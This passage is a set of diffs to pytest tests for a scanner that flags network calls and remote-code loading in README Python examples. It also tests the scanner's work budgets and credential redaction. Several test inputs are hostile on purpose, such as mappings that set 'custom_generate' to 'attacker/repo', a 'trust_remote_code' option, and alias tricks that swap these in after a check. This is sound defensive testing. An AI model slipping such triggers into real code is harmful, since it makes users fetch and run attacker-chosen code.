+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
 
     def test_readme_python_example_preserves_mixed_untrusted_requests(self) -> None:
         data = (
@@ -3562,6 +3573,112 @@ class TestNetworkCommDetector:
         findings = NetworkCommDetector().scan(data, "README.md")
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_bounds_scan_wide_mapping_proof_work(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Many maximal fences must share one bounded mapping-proof budget."""
+        calls = "\n".join("runner(**o)" for _ in range(139))
+        example = (
+            "import requests\n"
+            "from transformers import AutoModel\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "runner = model.generate\n"
+            "o = {'custom_generate': None}\n"
+            f"{calls}\n"
+            "requests.get('https://huggingface.co/org/model/resolve/main/sample.png', stream=True)\n"
+            "pass\n"
+            '""\n'
+            f"#{'x' * 750}\n"
+        )
+        node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
+        data = ((f"```python\n{example}```\n") * network_comm._MAX_README_IMAGE_EXAMPLE_FENCES).encode()
+        assert node_count == 1012
+        assert len(data) == 687_360
+
+        proof_calls = 0
+        max_proof_calls = network_comm._MAX_README_IMAGE_EXAMPLE_MAPPING_PROOF_WORK // node_count
+        assert max_proof_calls == 64
+        original_mapping_proof = network_comm._remote_code_mapping_is_proven_safe
+
+        def count_mapping_proof(*args: Any, **kwargs: Any) -> bool:
+            nonlocal proof_calls
+            proof_calls += 1
+            if proof_calls > max_proof_calls:
+                raise AssertionError("mapping proof work exceeded the scan-wide limit")
+            return original_mapping_proof(*args, **kwargs)
+
+        monkeypatch.setattr(network_comm, "_remote_code_mapping_is_proven_safe", count_mapping_proof)
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert proof_calls <= max_proof_calls
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_distinguishes_exact_mapping_proof_budget_from_overrun(self) -> None:
+        """An optional proof may consume the exact budget but must not hide an overrun."""
+        example = (
+            b"import requests\nfrom PIL import Image\n"
+            b"from transformers import AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"inputs = processor(images=image, return_tensors='pt')\n"
+            b"inputs.to('cpu')\n"
+        )
+        node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
+        assert node_count == 57
+
+        exact_budget = network_comm._ReadmeImageExampleProofBudget()
+        exact_budget.remaining = node_count
+        assert network_comm._is_valid_official_readme_sample_image_example(
+            example,
+            proof_budget=exact_budget,
+        )
+        assert exact_budget.remaining == 0
+        assert not exact_budget.exceeded
+
+        overrun_budget = network_comm._ReadmeImageExampleProofBudget()
+        overrun_budget.remaining = node_count - 1
+        assert not network_comm._is_valid_official_readme_sample_image_example(
+            example,
+            proof_budget=overrun_budget,
+        )
+        assert overrun_budget.exceeded
+
+    def test_readme_python_example_fails_closed_on_optional_mapping_proof_exhaustion(self) -> None:
+        """Unused mapping transfers cannot swallow production-budget exhaustion."""
+        transfers = "\n".join("inputs.to('cpu')" for _ in range(100))
+        example = (
+            "import requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            "model.generate(inputs)\n"
+            f"{transfers}\n"
+            '""\n'
+        )
+        node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
+        assert node_count == 770
+        detector = NetworkCommDetector()
+
+        findings = detector.scan(f"```python\n{example}```\n".encode(), "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+        safe_data = (
+            b"```python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+        safe_findings = detector.scan(safe_data, "README.md")
+        assert not [finding for finding in safe_findings if finding["type"] in {"network_library", "network_function"}]
 
     def test_readme_python_example_rejects_cyclic_generate_kwargs_mapping(self) -> None:
         """Memoization must not turn cyclic mapping provenance into a trusted value."""
@@ -5194,9 +5311,9 @@ class TestNetworkCommDetector:
         validated_examples: list[bytes] = []
         original_validator = network_comm._is_valid_official_readme_sample_image_example
 
-        def count_validation(example: bytes) -> bool:
+        def count_validation(example: bytes, **kwargs: Any) -> bool:
             validated_examples.append(example)
-            return original_validator(example)
+            return original_validator(example, **kwargs)
 
         monkeypatch.setattr(network_comm, "_is_valid_official_readme_sample_image_example", count_validation)
         data = (
@@ -5285,9 +5402,9 @@ class TestNetworkCommDetector:
         validated_examples: list[bytes] = []
         original_validator = network_comm._is_valid_official_readme_sample_image_example
 
-        def count_validation(example: bytes) -> bool:
+        def count_validation(example: bytes, **kwargs: Any) -> bool:
             validated_examples.append(example)
-            return original_validator(example)
+            return original_validator(example, **kwargs)
 
         monkeypatch.setattr(network_comm, "_is_valid_official_readme_sample_image_example", count_validation)
         example = (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -20,6 +20,27 @@ def _is_ci_environment() -> bool:
     return bool(os.getenv("CI") or os.getenv("GITHUB_ACTIONS"))
 
 
+def _make_dense_named_callable_history_example(binding_count: int = 76) -> str:
+    bindings = "\n".join("f=model.generate" for _ in range(binding_count))
+    return (
+        "import requests\n"
+        "from transformers import AutoModel\n"
+        "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+        "model = AutoModel.from_pretrained('official/model')\n"
+        "inputs = {'input_ids': 1}\n"
+        f"{bindings}\n"
+        "f(**inputs)\n"
+        "requests.get(image_url, stream=True)\n"
+    )
+
+
+def _pad_python_fence(example: str, target_size: int) -> bytes:
+    unpadded = f"```python\n{example}```\n"
+    padding = target_size - len(unpadded.encode())
+    assert padding >= 2
+    return f"```python\n{example}#{'x' * (padding - 2)}\n```\n".encode()
+
+
 class TestNetworkCommDetector:
     """Test the NetworkCommDetector class."""
 
@@ -4076,7 +4097,11 @@ class TestNetworkCommDetector:
         )
         fence = f"```python\n{example}```\n"
         node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
-        proof_work = node_count * 4
+        call_count = 4
+        binding_count = 4
+        # Each call charges its AST-relative write history and each bound value.
+        recursive_work = call_count * (node_count * binding_count + binding_count)
+        proof_work = node_count * call_count + recursive_work
         proof_budget = network_comm._ReadmeImageExampleProofBudget()
         proof_budget.named_callable_remaining = proof_work
 
@@ -4109,6 +4134,209 @@ class TestNetworkCommDetector:
 
         assert any(finding["type"] == "network_library" for finding in exhausted_findings)
         assert any(finding["type"] == "network_function" for finding in exhausted_findings)
+        assert not [finding for finding in fresh_findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_charges_dense_named_callable_history_before_expansion(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Call-relative history work must be charged before expensive expansion."""
+        binding_count = 76
+        example = _make_dense_named_callable_history_example(binding_count)
+        node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
+        proof_budget = network_comm._ReadmeImageExampleProofBudget()
+        proof_charges: list[int] = []
+        original_consume = proof_budget.consume_named_callable
+
+        def record_proof_work(work: int) -> bool:
+            proof_charges.append(work)
+            return original_consume(work)
+
+        monkeypatch.setattr(proof_budget, "consume_named_callable", record_proof_work)
+
+        assert node_count == 573
+        assert network_comm._is_valid_official_readme_sample_image_example(
+            example.encode(),
+            proof_budget=proof_budget,
+        )
+        assert proof_charges[0] == node_count
+        assert node_count * binding_count in proof_charges[1:]
+
+    @pytest.mark.parametrize("fence_count", [16, 32, 96])
+    def test_readme_python_example_bounds_dense_named_callable_histories(
+        self,
+        fence_count: int,
+    ) -> None:
+        """Compact call histories must exhaust shared work before becoming a CPU DoS."""
+        example = _make_dense_named_callable_history_example()
+        fence = _pad_python_fence(example, 1_926)
+        data = fence * fence_count
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert len(fence) == 1_926
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
+
+    def test_readme_python_example_dense_named_callable_budget_fails_aggregate_closed(
+        self,
+        tmp_path: Path,
+    ) -> None:
+        example = _make_dense_named_callable_history_example()
+        readme_path = tmp_path / "README.md"
+        readme_path.write_bytes(_pad_python_fence(example, 1_926) * 16)
+
+        aggregate = scan_model_directory_or_file(str(readme_path), cache_enabled=False)
+
+        assert determine_exit_code(aggregate) == 1
+
+    def test_readme_python_example_dense_named_callable_fallback_bounds_domain_redaction_work(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Rejected attribute histories must not trigger URL redaction for every code token."""
+        example = _make_dense_named_callable_history_example()
+        data = _pad_python_fence(example, 1_926) * 16
+        detector = NetworkCommDetector()
+        redaction_calls = 0
+        original_is_redacted = detector._is_redacted_url_value
+
+        def count_redaction_work(data: bytes, match_start: int, value: str) -> bool:
+            nonlocal redaction_calls
+            redaction_calls += 1
+            return original_is_redacted(data, match_start, value)
+
+        monkeypatch.setattr(detector, "_is_redacted_url_value", count_redaction_work)
+
+        detector.scan(data, "README.md")
+
+        assert redaction_calls < 100
+
+    def test_readme_python_example_large_padded_canonical_control_remains_safe(self) -> None:
+        example = (
+            "import requests\n"
+            "from PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            "model.generate(**inputs)\n"
+        )
+        data = _pad_python_fence(example, 1_915) * 96
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert len(data) == 183_840
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_charges_conditional_named_callable_resolution(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Conditional callable provenance must consume the shared proof budget."""
+        conditional_chain = "\n".join(
+            f"runner_{index + 1} = runner_{index} if image_url else runner_{index}" for index in range(24)
+        )
+        example = (
+            "import requests\n"
+            "from transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = {'input_ids': 1}\n"
+            "runner_0 = model.generate\n"
+            f"{conditional_chain}\n"
+            "runner_24(**inputs)\n"
+            "requests.get(image_url, stream=True)\n"
+        )
+        node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
+        proof_budget = network_comm._ReadmeImageExampleProofBudget()
+        proof_charges: list[int] = []
+        original_consume = proof_budget.consume_named_callable
+
+        def record_proof_work(work: int) -> bool:
+            proof_charges.append(work)
+            return original_consume(work)
+
+        monkeypatch.setattr(proof_budget, "consume_named_callable", record_proof_work)
+
+        assert network_comm._is_valid_official_readme_sample_image_example(
+            example.encode(),
+            proof_budget=proof_budget,
+        )
+        assert proof_charges[0] == node_count
+        assert len(proof_charges) > 1
+        assert sum(proof_charges[1:]) > 0
+
+    def test_readme_python_example_bounds_conditional_named_callable_histories_across_fences(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+        tmp_path: Path,
+    ) -> None:
+        """Conditional histories and unique call IDs share one fail-closed budget."""
+        example = (
+            "import requests\n"
+            "from transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = {'input_ids': 1}\n"
+            "direct = model.generate\n"
+            "conditional = direct if image_url else direct\n"
+            "direct(**inputs)\n"
+            "conditional(**inputs)\n"
+            "requests.get(image_url, stream=True)\n"
+        )
+        fence = f"```python\n{example}```\n"
+        fence_count = 32
+        data = (fence * fence_count).encode()
+        node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
+        preflight_work = node_count * 2
+        proof_charges: list[int] = []
+        original_consume = network_comm._ReadmeImageExampleProofBudget.consume_named_callable
+
+        def record_proof_work(budget: Any, work: int) -> bool:
+            proof_charges.append(work)
+            return original_consume(budget, work)
+
+        monkeypatch.setattr(
+            network_comm,
+            "_MAX_README_IMAGE_EXAMPLE_NAMED_CALLABLE_PROOF_WORK",
+            preflight_work * fence_count + 3,
+        )
+        monkeypatch.setattr(
+            network_comm._ReadmeImageExampleProofBudget,
+            "consume_named_callable",
+            record_proof_work,
+        )
+        readme_path = tmp_path / "README.md"
+        readme_path.write_bytes(data)
+
+        exhausted_findings = NetworkCommDetector().scan(data, readme_path.name)
+        direct_proof_charges = tuple(proof_charges)
+        aggregate = scan_model_directory_or_file(str(readme_path), cache_enabled=False)
+        fresh_findings = NetworkCommDetector().scan(
+            b"```python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n```\n",
+            "README.md",
+        )
+
+        assert any(0 < work < node_count for work in direct_proof_charges)
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in exhausted_findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in exhausted_findings
+        )
+        assert determine_exit_code(aggregate) == 1
         assert not [finding for finding in fresh_findings if finding["type"] in {"network_library", "network_function"}]
 
     def test_readme_python_example_distinguishes_exact_mapping_proof_budget_from_overrun(self) -> None:
@@ -4356,6 +4584,150 @@ class TestNetworkCommDetector:
         assert findings
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "mapping_expression",
+        [
+            (
+                "processor(images=image, return_tensors='pt') "
+                "if image.mode == 'RGB' else processor(images=image, return_tensors='pt')"
+            ),
+            (
+                "processor(images=image, return_tensors='pt') if image.mode == 'RGB' else ("
+                "processor(images=image, return_tensors='pt') if image.mode == 'RGBA' else "
+                "processor(images=image, return_tensors='pt'))"
+            ),
+        ],
+        ids=["two-safe-arms", "nested-safe-arms"],
+    )
+    def test_readme_python_example_allows_conditional_processor_mapping(
+        self,
+        mapping_expression: str,
+        tmp_path: Path,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"inputs = {mapping_expression}\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+        readme_path = tmp_path / "README.md"
+        readme_path.write_bytes(data)
+
+        findings = NetworkCommDetector().scan(data, readme_path.name)
+        aggregate = scan_model_directory_or_file(str(readme_path), cache_enabled=False)
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+        assert determine_exit_code(aggregate) == 0
+
+    @pytest.mark.parametrize(
+        ("mapping_setup", "mapping_expression"),
+        [
+            (
+                "def get_inputs():\n    return {'input_ids': 1}\n",
+                "processor(images=image) if image.mode == 'RGB' else get_inputs()",
+            ),
+            (
+                "alias = processor\n",
+                "processor(images=image) if image.mode == 'RGB' else alias(images=image)",
+            ),
+            (
+                "other = AutoProcessor.from_pretrained('official/model')\nother = model\n",
+                "processor(images=image) if image.mode == 'RGB' else other(images=image)",
+            ),
+            (
+                "def get_options():\n    return {'trust_remote_code': True}\noptions = get_options()\n",
+                "processor(images=image) if image.mode == 'RGB' else processor(**options)",
+            ),
+            (
+                "tokenizer = AutoTokenizer.from_pretrained('official/model')\n",
+                "processor(images=image) if image.mode == 'RGB' else tokenizer('hello')",
+            ),
+            (
+                "if image.mode:\n    processor = AutoProcessor.from_pretrained('official/model')\n",
+                "processor(images=image) if image.mode == 'RGB' else processor(images=image)",
+            ),
+            (
+                "def prepare():\n    processor = AutoProcessor.from_pretrained('official/model')\n",
+                "processor(images=image) if image.mode == 'RGB' else processor(images=image)",
+            ),
+            (
+                "",
+                "processor(images=image) if requests.get(image_url) else processor(images=image)",
+            ),
+            (
+                "def predicate():\n    return requests.get(image_url)\n",
+                "processor(images=image) if predicate() else processor(images=image)",
+            ),
+        ],
+        ids=[
+            "unknown-arm",
+            "aliased-arm",
+            "rebound-arm",
+            "dynamic-options-arm",
+            "mixed-mapping-factories",
+            "branch-only-factory-write",
+            "deferred-factory-write",
+            "side-effecting-condition",
+            "untrusted-condition",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_conditional_processor_mapping(
+        self,
+        mapping_setup: str,
+        mapping_expression: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor, AutoTokenizer\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_setup}"
+            f"inputs = {mapping_expression}\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
+
+    def test_readme_python_example_bounds_nested_conditional_processor_mapping(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        mapping_expression = "processor(images=image)"
+        for _ in range(16):
+            mapping_expression = f"processor(images=image) if image.mode == 'RGB' else ({mapping_expression})"
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"inputs = {mapping_expression}\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+        monkeypatch.setattr(network_comm, "_MAX_README_IMAGE_EXAMPLE_MAPPING_PROOF_WORK", 8)
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
         "compound_statement",
@@ -7737,6 +8109,64 @@ def test_sensitive_hint_prose_near_match_skips_shared_evidence_redactor(
     findings = NetworkCommDetector().scan(data, "model-card.txt")
 
     assert sum(finding.get("ip") == ip for finding in findings) == 100
+
+
+@pytest.mark.parametrize(
+    "url_template",
+    [
+        "https://example.com/download?api_key=secret{index}.invalid",
+        "https://example.com/api_key/secret{index}.invalid/download",
+    ],
+    ids=["query", "path"],
+)
+def test_filtered_url_credentials_do_not_consume_shared_evidence_budget(
+    monkeypatch: pytest.MonkeyPatch,
+    url_template: str,
+) -> None:
+    """URL redaction must classify filtered credential-shaped domains before shared evidence."""
+    calls = 0
+    original_redactor = network_comm._redact_network_evidence
+
+    def count_shared_redaction(text: str) -> str:
+        nonlocal calls
+        calls += 1
+        return original_redactor(text)
+
+    monkeypatch.setattr(network_comm, "_redact_network_evidence", count_shared_redaction)
+    data = "\n".join(url_template.format(index=index) for index in range(40)).encode()
+    detector = NetworkCommDetector()
+
+    findings = detector.scan(data, "README.md")
+
+    assert calls == 0
+    assert detector._evidence_redaction_classifications == 0
+    assert not detector._evidence_redaction_limit_reached
+    assert not any(finding["type"] == "detector_finding_limit" for finding in findings)
+    serialized = json.dumps(findings, sort_keys=True)
+    assert all(f"secret{index}.invalid" not in serialized for index in range(40))
+
+
+def test_filtered_bare_credential_uses_shared_evidence_redaction(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """A bare credential-shaped domain still needs shared evidence classification."""
+    calls = 0
+    original_redactor = network_comm._redact_network_evidence
+
+    def count_shared_redaction(text: str) -> str:
+        nonlocal calls
+        calls += 1
+        return original_redactor(text)
+
+    monkeypatch.setattr(network_comm, "_redact_network_evidence", count_shared_redaction)
+    detector = NetworkCommDetector()
+
+    findings = detector.scan(b"api_key=secret.invalid", "tokens.txt")
+
+    assert calls == 1
+    assert detector._evidence_redaction_classifications == 1
+    assert not detector._evidence_redaction_limit_reached
+    assert "secret.invalid" not in json.dumps(findings, sort_keys=True)
 
 
 def test_shared_evidence_redaction_classification_budget_fails_closed(

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3331,6 +3331,26 @@ class TestNetworkCommDetector:
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    def test_readme_python_example_allows_ordered_nested_literal_mapping(self) -> None:
+        """A static mapping bound earlier in the same supported body is canonical."""
+        data = (
+            b"```python\nimport requests\nfrom PIL import Image\n"
+            b"from transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"if True:\n"
+            b"    inputs = {'input_ids': 1}\n"
+            b"    model.generate(**inputs)\n"
+            b"```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
     @pytest.mark.parametrize(
         "compound_statement",
         [
@@ -3432,6 +3452,61 @@ class TestNetworkCommDetector:
 
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "compound_statement",
+        [
+            (
+                "if True:\n"
+                "    inputs = {'input_ids': 1}\n"
+                "    alias = inputs\n"
+                "    alias |= {'custom_generate': 'attacker/repo'}\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "if True:\n"
+                "    inputs = {'input_ids': 1}\n"
+                "    inputs = {'custom_generate': 'attacker/repo'}\n"
+                "    model.generate(**inputs)\n"
+            ),
+            ("if True:\n    inputs = {'custom_generate': 'attacker/repo'}\n    model.generate(**inputs)\n"),
+            "if True:\n    inputs = {'input_ids': 1}\nmodel.generate(**inputs)\n",
+            ("if True:\n    inputs = {'input_ids': 1}\nelse:\n    model.generate(**inputs)\n"),
+            "for _ in range(1):\n    inputs = {'input_ids': 1}\n    model.generate(**inputs)\n",
+            "def prepare():\n    inputs = {'input_ids': 1}\n    model.generate(**inputs)\n",
+        ],
+        ids=[
+            "same-body-alias-mutation",
+            "same-body-rebind",
+            "remote-code-key",
+            "cross-scope",
+            "sibling-branch",
+            "repeated-loop",
+            "deferred-function",
+        ],
+    )
+    def test_readme_python_example_rejects_unsafe_nested_literal_mapping(
+        self,
+        compound_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{compound_statement}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
 
     @pytest.mark.parametrize(
         ("factory_name", "instance_name", "mapping_expression"),
@@ -3708,6 +3783,37 @@ class TestNetworkCommDetector:
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    @pytest.mark.parametrize(
+        "device_transfer",
+        [
+            ("if True:\n    device = 'cuda'\n    model.generate(**inputs.to(device))\n"),
+            ("device = 'cuda'\nmodel.generate(**inputs.to(device))\ndevice = image.mode\n"),
+            ("if True:\n    device = 'cuda'\n    inputs = inputs.to(device)\n    model.generate(**inputs)\n"),
+        ],
+        ids=["same-body-binding", "later-eager-write", "same-body-mapping-rebind"],
+    )
+    def test_readme_python_example_allows_call_relative_named_device(
+        self,
+        device_transfer: str,
+    ) -> None:
+        """A uniquely prior literal device remains valid at its exact use."""
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            f"{device_transfer}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
     def test_readme_python_example_allows_standalone_mapping_device_transfer(self) -> None:
         """BatchEncoding.to mutates the proven mapping without replacing it."""
         data = (
@@ -3720,6 +3826,25 @@ class TestNetworkCommDetector:
             b"inputs = processor(images=image, return_tensors='pt')\n"
             b"inputs.to('cuda')\n"
             b"model.generate(**inputs)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_allows_inline_transfer_of_proven_mapping(self) -> None:
+        """A proven BatchEncoding may be transferred directly at generate."""
+        data = (
+            b"```python\nimport requests\nfrom PIL import Image\n"
+            b"from transformers import AutoModel, AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"inputs = processor(images=image, return_tensors='pt')\n"
+            b"model.generate(**inputs.to('cuda'))\n```\n"
         )
 
         findings = NetworkCommDetector().scan(data, "README.md")
@@ -3757,6 +3882,93 @@ class TestNetworkCommDetector:
 
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "body",
+        [
+            "model.generate(**inputs.to(image.mode))\n",
+            "model.generate(**inputs.to('cpu', 'cuda'))\n",
+            ("alias = inputs\nalias |= {'custom_generate': 'attacker/repo'}\nmodel.generate(**inputs.to('cuda'))\n"),
+            ("inputs = {'custom_generate': 'attacker/repo'}\nmodel.generate(**inputs.to('cuda'))\n"),
+            (
+                "deferred = (model.generate(**inputs.to('cuda')) for _ in range(1))\n"
+                "inputs = {'custom_generate': 'attacker/repo'}\n"
+            ),
+        ],
+        ids=["dynamic-device", "extra-device", "alias-mutation", "mapping-rebind", "deferred-rebind"],
+    )
+    def test_readme_python_example_rejects_unsafe_inline_transfer_of_proven_mapping(
+        self,
+        body: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            f"{body}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
+
+    @pytest.mark.parametrize(
+        "device_transfer",
+        [
+            ("if True:\n    device = image.mode\n    model.generate(**inputs.to(device))\n"),
+            ("if True:\n    device = 'attacker'\n    model.generate(**inputs.to(device))\n"),
+            "if True: device = image.mode; model.generate(**inputs.to(device))\n",
+            "for device in [image.mode]:\n    model.generate(**inputs.to(device))\n",
+            "with torch.no_grad() as device:\n    model.generate(**inputs.to(device))\n",
+            "if True:\n    del device\n    model.generate(**inputs.to(device))\n",
+            ("if True:\n    device = image.mode\n    inputs = inputs.to(device)\n    model.generate(**inputs)\n"),
+        ],
+        ids=[
+            "nested-dynamic-rebind",
+            "nested-attacker-string",
+            "same-line-rebind",
+            "loop-target-rebind",
+            "with-target-rebind",
+            "deleted-device",
+            "mapping-rebind",
+        ],
+    )
